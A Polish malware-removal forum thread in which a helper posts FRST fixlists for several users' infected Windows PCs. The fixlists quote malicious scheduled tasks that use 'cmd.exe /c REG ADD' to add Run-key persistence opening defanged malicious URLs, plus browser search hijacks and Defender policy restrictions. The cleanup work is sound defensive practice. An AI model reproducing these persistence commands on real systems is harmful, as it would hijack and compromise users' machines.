    Napisz, czy problem znikł?

     

    F.

  13. Napisano · Edytowane przez filutka78

    >>@michal105pl

     

    Uruchom FRST. NA klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego:

    HKU\S-1-5-21-2675971358-1594037437-852225918-1001\...\Run: [Michał] => explorer.exe hxxp://kb-ribaki.org <==== UWAGA

    EmptyTemp:

    Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  15. Napisano · Edytowane przez filutka78

    >>@michal105pl

     

    Zrób nowe logi FRST.

     

    domyślam się, że powodem jest imię:

    Micha�" => nie znaleziono

     

     

    F.

     

    =================================

     

    >>@Syaoran3

     

    Otwórz Notatnik i wklej w nim:

    Task: {30968715-C159-46DE-ABF1-75A4D83A1357} - System32\Tasks\Fuze => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Fuze /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== ATTENTION

    HKU\S-1-5-21-949699123-2469139470-3096722293-1000\...\Run: [Fuze] => explorer.exe hxxp://ozirizsoos.info <==== ATTENTION

    Task: {63348E62-441A-4B33-BA6F-94548B62EC79} - System32\Tasks\steamwebhelper_killer => TASKKILL [Argument = /F /IM steamwebhelper.exe /T] <==== ATTENTION

    S3 MSICDSetup; \??\D:\CDriver64.sys [X]

    S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]

    S3 VGPU; System32\drivers\rdvgkmd.sys [X]

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Fuze\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

    ===============================================

  16. Napisano · Edytowane przez filutka78

    >>@michal105pl

     

    Otwórz Notatnik i wklej w nim:

    Task: {2B1857CC-AC9E-4ACF-9B3B-4028B074E4B4} - System32\Tasks\Michał => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Michał /t REG_SZ /d "explorer.exe hxxp://kb-ribaki.org" <==== UWAGA

    HKU\S-1-5-21-2675971358-1594037437-852225918-1001\...\Run: [Michał] => explorer.exe hxxp://kb-ribaki.org <==== UWAGA

    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku

    Task: {963A2C2C-0CDD-40C4-8811-71EBC6DB58EA} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA

    Task: {FB712BCC-B199-45A5-81E7-D7966187EE77} - System32\Tasks\{24464952-0470-4774-902B-282197B13367} => C:\Windows\system32\pcalua.exe -a C:\Users\Krzysiek\Desktop\Utility\setup.exe -d C:\Users\Krzysiek\Desktop\Utility

    HKLM\SYSTEM\CurrentControlSet\Services\aswSP <==== UWAGA (Rootkit!)

    HKLM\SYSTEM\CurrentControlSet\Services\aswMonFlt <==== UWAGA (Rootkit!)

    HKLM\SYSTEM\CurrentControlSet\Services\aswSnx <==== UWAGA (Rootkit!)

    S3 GPU-Z; \??\C:\Users\Krzysiek\AppData\Local\Temp\GPU-Z.sys [X] <==== UWAGA

    2018-01-10 18:08 - 2018-01-10 18:08 - 000457896 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw6b6c943059386f73.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000358672 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw662d31765d988d80.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000204456 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw50a50ee9a8f27a48.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000185096 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswbeeadad705df459a.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000146648 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw2f7f57a1f4092690.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000110336 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw83380a92571b9252.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000084384 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw5d959aaffd08c1d5.tmp

    2018-01-10 18:08 - 2018-01-10 18:08 - 000046976 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswc8c0e99e454f914f.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 001025176 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw84876a81e9769f54.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 000343768 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw96dffa5f3cee7387.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 000321512 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw893b262f8dfb8548.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 000199448 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswd899dc60d01dda90.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 000149344 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw81a5a274177695b2.tmp

    2018-01-10 18:08 - 2018-01-10 18:07 - 000057696 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswdce1fda47b00de81.tmp

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść na E:\

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  17. Napisano · Edytowane przez filutka78

    >>@gawronZlasu

     

    Otwórz Notatnik i wklej w nim:

    Task: {AF565386-60BA-487F-ABA7-F02333356BEA} - System32\Tasks\Patryk => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Patryk /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1284015929-3196918272-2096321056-1001\...\Run: [Patryk] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    Task: {F256D924-6B0B-437C-8BE9-77694209D58E} - \CCleanerSkipUAC -> Brak pliku <==== UWAGA

    Task: {F9FF2191-20DA-4E44-B2B3-5F52DDF7F278} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Patryk\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  18. Napisano · Edytowane przez filutka78

    -------@mossie

     

    1) Odinstaluj niepotrzebny do niczego program Akamai NetSession Interface

     

    2)Otwórz Notatnik i wklej w nim:

    Task: {DAE57F35-EE13-4C31-BD65-9E8FF0B39A38} - System32\Tasks\klaudia5541 => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v klaudia5541 /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=ds&ts=1430278751&from=cor&uid=TOSHIBAXMQ01ABD075_Y3UACEASTXXY3UACEAST&q={searchTerms}

    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://do-search.com/web/?type=ds&ts=1430278751&from=cor&uid=TOSHIBAXMQ01ABD075_Y3UACEASTXXY3UACEAST&q={searchTerms}

    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=ds&ts=1430278751&from=cor&uid=TOSHIBAXMQ01ABD075_Y3UACEASTXXY3UACEAST&q={searchTerms}

    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://do-search.com/web/?type=ds&ts=1430278751&from=cor&uid=TOSHIBAXMQ01ABD075_Y3UACEASTXXY3UACEAST&q={searchTerms}

    BHO-x32: Brak nazwy -> {f439aa7e-a2a0-4635-99a2-164180e848ca} -> Brak pliku

    FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [brak pliku]

    S2 McAPExe; "C:\Program Files\McAfee\MSC\McAPExe.exe" [X]

    S2 McMPFSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]

    S2 McNaiAnn; "C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]

    S3 McODS; "C:\Program Files\mcafee\VirusScan\mcods.exe" [X]

    S2 mcpltsvc; "C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]

    S2 McProxy; "C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]

    S2 mfecore; "C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe" [X]

    C:\Windows\Reimage.ini

    Task: {53F21FD5-0865-4266-B928-B265E9B2A891} - System32\Tasks\{2ED8CC44-4794-4264-94B3-B264D514541F} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\Autodesk\Content Service\Setup\Setup.exe" -c /P {A37CDB58-AAE8-0000-8C13-E0F7BACB0D5F} /M ContentService /LANG pl-PL

    Task: {8F3D323B-F91C-462A-A532-F7614E2E1060} - System32\Tasks\{93A51E37-CA4B-4A3E-923A-1A5205BAE4A5} => C:\Windows\system32\pcalua.exe -a C:\Users\klaudia5541\AppData\Local\Akamai\uninstall.exe

    HKU\S-1-5-21-3638775723-2276981509-1444987665-1002\...\Run: [Akamai NetSession Interface] => C:\Users\klaudia5541\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)

    C:\Users\klaudia5541\AppData\Local\Akamai\netsession_win.exe

    HKU\S-1-5-21-3638775723-2276981509-1444987665-1002\...\Policies\Explorer: []

    GroupPolicy: Ograniczenia - Chrome <==== UWAGA

    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\klaudia5541\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    3) Napisz, czy problem znikł?

     

    F.

  19. Napisano · Edytowane przez filutka78

    ---------->>@Fooxiu

     

    Otwórz Notatnik i wklej w nim:

    Task: {CF12F724-FBE9-4610-9BC1-33D699E75777} - System32\Tasks\Jarek => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Jarek /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1737153397-2882243089-4092062542-1001\...\Run: [Jarek] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Jarek\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  21. Napisano · Edytowane przez filutka78

    ------------->>@SzpaQ10

     

    Otwórz Notatnik i wklej w nim:

    Task: {4FEA9EAD-5D50-45CD-BB8E-2ED1FB290F40} - System32\Tasks\Paweł => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Paweł /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-2894854904-3995269637-3683302665-1001\...\Run: [Paweł] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    C:\Users\Paweł\Downloads\SpyHunter-Installer.exe

    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku

    Task: {102D4F43-57B4-48D6-BB8A-96F7900239CF} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA

    Task: {BB466BD9-5FE4-490C-A22F-D445E71AA322} - System32\Tasks\{8464BAF4-D3C2-43FB-90A8-1440832BB29F} => C:\Windows\system32\pcalua.exe -a G:\OriginSetup.exe -d G:\

    Task: {CB3E9D60-5E41-42B7-972E-8F5865F0F3C6} - System32\Tasks\App Explorer => C:\Users\Paweł\AppData\Local\Host App Service\Engine\HostAppServiceUpdater.exe [2017-12-19] (SweetLabs, Inc) <==== UWAGA

    C:\Users\Paweł\AppData\Local\Host App Service

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Paweł\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

  23. Napisano · Edytowane przez filutka78

    -----------<<@grzegorz_90

     

    1) Odinstaluj niepotrzebny do niczego program Akamai NetSession Interface

     

    2) Otwórz Notatnik i wklej w nim:

    Task: {330D5188-CFA2-4DF6-A9DE-1BE5349380F2} - System32\Tasks\Grzegorz => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Grzegorz /t REG_SZ /d "explorer.exe hxxp://kb-ribaki.org" <==== UWAGA

    HKU\S-1-5-21-4250627399-2877908163-230018829-1000\...\Run: [Grzegorz] => explorer.exe hxxp://kb-ribaki.org <==== UWAGA

    HKU\S-1-5-21-4250627399-2877908163-230018829-1000\...\Policies\Explorer: []

    Toolbar: HKLM - DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files (x86)\DAEMON Tools Toolbar\DTToolbar64.dll Brak pliku

    Toolbar: HKU\S-1-5-21-4250627399-2877908163-230018829-1000 -> DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Program Files (x86)\DAEMON Tools Toolbar\DTToolbar64.dll Brak pliku

    Toolbar: HKU\S-1-5-21-4250627399-2877908163-230018829-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku

    Toolbar: HKU\S-1-5-21-4250627399-2877908163-230018829-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku

    CustomCLSID: HKU\S-1-5-21-4250627399-2877908163-230018829-1000_Classes\CLSID\{0B628DE4-07AD-4284-81CA-5B439F67C5E6}\localserver32 -> E:\Nowy folder (3)\autocad\AutoCAD 2016\acad.exe /Automation => Brak pliku

    CustomCLSID: HKU\S-1-5-21-4250627399-2877908163-230018829-1000_Classes\CLSID\{149DD748-EA85-45A6-93C5-AC50D0260C98}\localserver32 -> E:\Nowy folder (3)\autocad\AutoCAD 2016\acad.exe => Brak pliku

    CustomCLSID: HKU\S-1-5-21-4250627399-2877908163-230018829-1000_Classes\CLSID\{5370C727-1451-4700-A960-77630950AF6D}\localserver32 -> E:\Nowy folder (3)\autocad\AutoCAD 2016\acad.exe /Automation => Brak pliku

    CustomCLSID: HKU\S-1-5-21-4250627399-2877908163-230018829-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> E:\Nowy folder (3)\autocad\AutoCAD 2016\pl-PL\acadficn.dll => Brak pliku

    Task: {7A8C7B53-D9BC-42C0-A24F-0AF9AC47D819} - System32\Tasks\{72AAD930-026E-4C0B-BBA3-6DD144F1273B} => C:\Windows\system32\pcalua.exe -a C:\Users\Grzegorz\Desktop\LeagueofLegends_EUNE_Installer_9_15_2014.exe -d C:\Windows\SysWOW64 -c /groupsextract:100;101;102; /out:"C:\Users\Grzegorz\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:5452

    ShortcutWithArgument: C:\Users\Grzegorz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2"

    HKLM-x32\...\Run: [] => [X]

    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA

    HKU\S-1-5-21-4250627399-2877908163-230018829-1000\...\Run: [bingSvc] => C:\Users\Grzegorz\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)

    HKU\S-1-5-21-4250627399-2877908163-230018829-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Grzegorz\AppData\Local\Akamai\netsession_win.exe [4691384 2015-09-10] (Akamai Technologies, Inc.)

    C:\Users\Grzegorz\AppData\Local\Akamai\netsession_win.exe

    CHR HKU\S-1-5-21-4250627399-2877908163-230018829-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fcfenmboojpjinhpgggodefccipikbpd] - hxxps://clients2.google.com/service/update2/crx

    S3 gdrv; \??\C:\Windows\gdrv.sys [X]

    C:\Users\Grzegorz\Downloads\fixlist.txt

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść na D:\

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    3) Napisz, czy problem znikł?

     

    F.

  24. Napisano · Edytowane przez filutka78

    ----------------@arekplendz

     

    1) Otwórz Notatnik i wklej w nim:

    Task: {92BBF250-CA64-4D98-BE62-10E93D93EEFF} - System32\Tasks\Arek => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v Arek /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-2388787366-2246849358-3497634261-1000\...\Run: [Arek] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku

    CHR DefaultSearchURL: Default -> hxxp://feed.safefinder.biz/?fext=true&publisherid=51218&publisher=extensiondefaultap&st=ed&q={searchTerms}

    CHR DefaultSearchKeyword: Default -> SafeFinder

    CHR HKLM-x32\...\Chrome\Extension: [jidkebcigjgheaahopdnlfaohgnocfai] - hxxps://clients2.google.com/service/update2/crx

    CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

    S3 IMFFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\win7_amd64\IMFFilter.sys [X]

    S3 RegFilter; \??\C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\win7_amd64\regfilter.sys [X]

    S3 VGPU; System32\drivers\rdvgkmd.sys [X]

    S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

    2017-12-30 19:06 - 2017-12-30 19:06 - 000000000 _____ C:\Users\Arek\explorer.exe

    2017-12-30 19:06 - 2017-12-30 19:06 - 000000000 _____ C:\Users\Arek\DefaultScope

    2017-12-30 19:06 - 2017-12-30 19:06 - 000000000 _____ C:\Users\Arek\cmd.exe

    2017-12-30 19:06 - 2017-12-30 19:06 - 000000000 _____ C:\Users\Arek\Brak

    2017-12-30 19:06 - 2017-12-30 19:06 - 000000000 _____ C:\Users\Arek\{F54338F5-12E2-42C9-A371-27648112B1D0}

    C:\Windows\Minidump\*.dmp

    2016-06-13 16:28 - 2016-06-13 16:28 - 001759964 _____ () C:\Users\Arek\AppData\Roaming\Redtom.tst

    2016-06-13 16:29 - 2016-06-13 16:29 - 000032038 _____ () C:\Users\Arek\AppData\Roaming\uninstall_temp.ico

    HOSTS:

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\Arek\Desktop\Downloads

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    2) SpyHunter - to nie jest zaufany program.

    spróbuj odinstalować w ten sposób:

    kliknij na tę ikonkę C:\Users\nazwa Użytkownika\Start Menu\Programs\SpyHunter\Uninstall.lnk (czyli >>START >>Programy>>SpyHunter>>Uninstall)

    wyskoczy okienko, ale zamiast klikać wielki zielony guzik "continue" kliknij "no, thanks". To drugie odinstalowuje.

     

    3) Napisz, czy problem znikł?

     

    F.

  25. Napisano · Edytowane przez filutka78

    -------------->>@SSR

     

    Otwórz Notatnik i wklej w nim:

    ShortcutWithArgument: C:\Users\FreeD\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://esurf.biz/?ssid=1457992686&a=1050446&src=sh&uuid=ffb22fb6-0ff6-4c36-a6e7-ab276ef1d685"

    Task: {48BAE109-1037-40C6-9573-9F98EEC12087} - System32\Tasks\FreeD => cmd.exe /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v FreeD /t REG_SZ /d "explorer.exe hxxp://ozirizsoos.info" <==== UWAGA

    HKU\S-1-5-21-1872459814-2998028442-41792524-1001\...\Run: [FreeD] => explorer.exe hxxp://ozirizsoos.info <==== UWAGA

    ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku

    ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku

    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku

    ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku

    ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku

    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze C:\Users\FreeD\Desktop\frst

    Uruchom FRST i kliknij przycisk Fix (NAPRAW).

     

    Napisz, czy problem znikł?

     

    F.

×
×
  • Dodaj nową pozycję...